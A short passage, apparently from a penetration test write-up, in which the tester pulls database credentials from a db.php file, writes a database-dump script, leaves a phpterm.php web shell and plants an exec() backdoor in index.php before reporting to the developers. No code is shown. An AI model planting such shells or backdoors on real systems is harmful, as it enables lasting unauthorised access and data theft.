The Rest of the Details
Given that I had full control over the application, the game was basically over. However, it is always good to clean up with a few more tidbits of information. So, I poked around and found a file called db.php, which contained the database connection string with user/pass (see Figure 8). To ensure my continued access, or at least show I could maintain control, I created a small script that would dump the database using these credentials to a file of my choice. I also left behind a phpterm.php script in a "safe" location to give me quick access to a shell if I need it later, and added a small backdoor into the index.php script that would allow me to execute commands on the server via the exec() function. With all this "enhancements" in place, I then prepared the report and went to talk with the web developers.
Figure 8: db_php.php details